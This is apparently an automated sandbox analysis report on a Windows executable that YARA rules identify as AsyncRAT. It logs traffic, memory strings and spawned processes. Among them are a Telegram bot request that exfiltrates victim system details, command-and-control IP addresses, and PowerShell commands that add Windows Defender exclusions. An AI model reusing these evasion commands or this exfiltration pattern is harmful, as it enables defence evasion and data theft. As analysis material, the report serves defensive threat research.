                Source: global trafficHTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: unknownTCP traffic detected without corresponding DNS query: 51.158.147.144
                Source: unknownTCP traffic detected without corresponding DNS query: 72.132.134.217
                Source: unknownTCP traffic detected without corresponding DNS query: 140.78.100.15
                Source: unknownTCP traffic detected without corresponding DNS query: 185.119.118.59
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: securefirewall.portmap.io
                Source: global trafficDNS traffic detected: DNS query: libyaalahrar.co
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.171.125.177:9000
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:2789/
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:2789/pData
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.88.44.159:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.141.24:8080
                Source: unknown. HTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe. Window created: window name: CLIPBRDWNDCLASS

                System Summary

                Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY. Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe. Process Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09EB4325_2_6C09EB43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA64725_2_6C0DA647
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09E04025_2_6C09E040
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09C26025_2_6C09C260
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E3CE025_2_6C0E3CE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09B91225_2_6C09B912
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E596025_2_6C0E5960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A998425_2_6C0A9984
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ED9C025_2_6C0ED9C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DFAA225_2_6C0DFAA2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09B03725_2_6C09B037
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A928025_2_6C0A9280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FACF025_2_6C1FACF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C344D3025_2_6C344D30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DCD9D25_2_6C1DCD9D
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACD8025_2_6C1ACD80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192DA025_2_6C192DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E0225_2_6C184E02
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E4B25_2_6C184E4B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEE4025_2_6C1DEE40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184E8125_2_6C184E81
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184ECC25_2_6C184ECC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEEE025_2_6C1CEEE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184F3725_2_6C184F37
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEF7025_2_6C1CEF70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FCF7025_2_6C1FCF70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECF9025_2_6C1ECF90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AAF8025_2_6C2AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEFAB25_2_6C1CEFAB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F0FE025_2_6C1F0FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F883025_2_6C1F8830
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E085525_2_6C1E0855
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CC8B025_2_6C1CC8B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1868E725_2_6C1868E7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C890025_2_6C1C8900
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CC94C25_2_6C1CC94C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1849FB25_2_6C1849FB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DCA1025_2_6C1DCA10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184A2625_2_6C184A26
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E2A5025_2_6C1E2A50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAA8025_2_6C1FAA80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C184AA025_2_6C184AA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAAEC25_2_6C1FAAEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C8B1B25_2_6C1C8B1B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EB0025_2_6C18EB00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2A2B1025_2_6C2A2B10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C188B9025_2_6C188B90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DABB025_2_6C1DABB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C182BA025_2_6C182BA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FABC025_2_6C1FABC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C188BC725_2_6C188BC7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18443925_2_6C184439
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E4B025_2_6C18E4B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D055025_2_6C1D0550
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18456825_2_6C184568
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18656C25_2_6C18656C
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll 3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll 91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                Source: yt7dW9nyJK.exe Static PE information: invalid certificate
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000000.2037582727.0000000000190000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamexsUpf.exe2 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.000000000060E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000000.00000002.2070321293.0000000004C90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCAA.dll4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000416000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
                Source: yt7dW9nyJK.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: yt7dW9nyJK.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ffmaba.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ffmaba.exe.11.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs Base64 encoded strings found
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs Base64 encoded strings found
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.AddAccessRule
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.AddAccessRule
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.SetAccessControl
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@67/78@7/14
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.log
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Mutant created: \Sessions\1\BaseNamedObjects\SXVvkYHBJwlTYefsyEntPmgFop
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Mutant created: \Sessions\1\BaseNamedObjects\dkm6mrq0hw
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Mutant created: \Sessions\1\BaseNamedObjects\kAU1GvVR3izXMfie
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1
                Source: yt7dW9nyJK.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: yt7dW9nyJK.exe ReversingLabs: Detection: 42%
                Source: unknown Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
